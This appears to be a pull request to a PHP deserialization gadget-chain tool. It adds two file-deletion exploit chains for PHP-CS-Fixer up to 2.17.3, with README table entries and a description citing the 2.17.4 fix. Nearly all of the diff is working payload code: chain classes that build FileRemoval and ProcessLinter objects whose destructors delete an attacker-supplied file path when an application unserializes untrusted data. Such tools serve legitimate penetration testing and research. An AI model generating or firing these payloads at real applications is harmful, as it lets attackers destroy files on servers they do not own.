### PR TITLE
Add PHP-CS-Fixer FD Gadgets

### DIFF
--- a/README.md
+++ b/README.md
@@ -46,6 +46,8 @@ Monolog/RCE2                              1.5 <= 2.1.1+                   RCE (F
 Monolog/RCE3                              1.1.0 <= 1.10.0                 RCE (Function call)    __destruct          
 Monolog/RCE4                              ? <= 2.4.4+                     RCE (Command)          __destruct     *    
 Phalcon/RCE1                              <= 1.2.2                        RCE                    __wakeup       *    
+PHPCSFixer/FD1                            <= 2.17.3                       File delete            __destruct          
+PHPCSFixer/FD2                            <= 2.17.3                       File delete            __destruct          
 PHPExcel/FD1                              1.8.2+                          File delete            __destruct          
 PHPExcel/FD2                              <= 1.8.1                        File delete            __destruct          
 PHPExcel/FD3                              1.8.2+                          File delete            __destruct          

--- a/gadgetchains/PHPCSFixer/FD/1/chain.php
+++ b/gadgetchains/PHPCSFixer/FD/1/chain.php
@@ -1,0 +1,17 @@
+<?php
+namespace GadgetChain\PHPCSFixer;
+
+class FD1 extends \PHPGGC\GadgetChain\FileDelete
+{
+    public static $version = '<= 2.17.3';
+    public static $vector = '__destruct';
+    public static $author = 'snoopysecurity';
+
+    public function generate(array $parameters)
+    {
+        $remote_file = $parameters["remote_file"];
+
+        return new \PhpCsFixer\FileRemoval($remote_file);
+    }
+}
+

--- a/gadgetchains/PHPCSFixer/FD/1/gadgets.php
+++ b/gadgetchains/PHPCSFixer/FD/1/gadgets.php
@@ -1,0 +1,44 @@
+<?php
+
+namespace PhpCsFixer
+{
+//https://github.com/FriendsOfPHP/PHP-CS-Fixer/blob/v2.17.3/src/FileRemoval.php
+    class FileRemoval
+    {
+
+        function __construct($remote_file)
+        {
+            $this->files = [$remote_file => $remote_file];
+
+        }
+
+    }
+}
+
+/* 
+    public function __destruct()
+    {
+        $this->clean();
+    }
+
+
+
+
+    public function clean()
+    {
+        foreach ($this->files as $file => $value) {
+            $this->unlink($file);
+        }
+        $this->files = [];
+    }
+
+    private function unlink($path)
+    {
+        @unlink($path);
+    }
+}
+
+
+
+?>
+

--- a/gadgetchains/PHPCSFixer/FD/1/gadgets.php
+++ b/gadgetchains/PHPCSFixer/FD/1/gadgets.php
@@ -37,8 +37,7 @@ namespace PhpCsFixer
         @unlink($path);
     }
 }
-
+*/
 
 
 ?>
-

--- a/gadgetchains/PHPCSFixer/FD/2/chain.php
+++ b/gadgetchains/PHPCSFixer/FD/2/chain.php
@@ -1,0 +1,17 @@
+<?php
+
+namespace GadgetChain\PHPCSFixer;
+
+class FD2 extends \PHPGGC\GadgetChain\FileDelete
+{
+    public static $version = '<= 2.17.3';
+    public static $vector = '__destruct';
+    public static $author = 'snoopysecurity';
+
+    public function generate(array $parameters)
+    {
+        $remote_file = $parameters["remote_file"];
+
+        return new \PhpCsFixer\Linter\ProcessLinter($remote_file);
+    }
+}

--- a/gadgetchains/PHPCSFixer/FD/2/gadgets.php
+++ b/gadgetchains/PHPCSFixer/FD/2/gadgets.php
@@ -1,0 +1,62 @@
+<?php
+namespace PhpCsFixer\Linter
+{
+    //https://github.com/FriendsOfPHP/PHP-CS-Fixer/blob/v2.17.3/src/Linter/ProcessLinter.php
+    class ProcessLinter
+    {
+
+        function __construct($remote_file)
+        {
+            $this->temporaryFile = $remote_file;
+            $this->fileRemoval = new \PhpCsFixer\FileRemoval();
+
+        }
+
+        /*
+        public function __destruct()
+        {
+        if (null !== $this->temporaryFile) {
+            $this->fileRemoval->delete($this->temporaryFile);
+        }
+        }
+        */
+
+    }
+}
+
+namespace PhpCsFixer
+{
+
+    //https://github.com/FriendsOfPHP/PHP-CS-Fixer/blob/v2.17.3/src/FileRemoval.php
+    class FileRemoval
+
+    {
+
+        public function delete($path)
+        {
+            if (isset($this->files[$path]))
+            {
+                unset($this->files[$path]);
+            }
+            $this->unlink($path);
+        }
+        private function unlink($path)
+        {
+            @unlink($path);
+        }
+
+    }
+}
+
+/*
+        public function delete($path)
+    {
+        if (isset($this->files[$path])) {
+            unset($this->files[$path]);
+        }
+        $this->unlink($path);
+    }
+
+*/
+
+?>


### PR DESCRIPTION
This PR adds two File Delete gadgets for https://github.com/FriendsOfPHP/PHP-CS-Fixer which was fixed in 2.17.4 (https://github.com/FriendsOfPHP/PHP-CS-Fixer/commit/486254000b5d4cb9e770eb6d488e162fb885b295)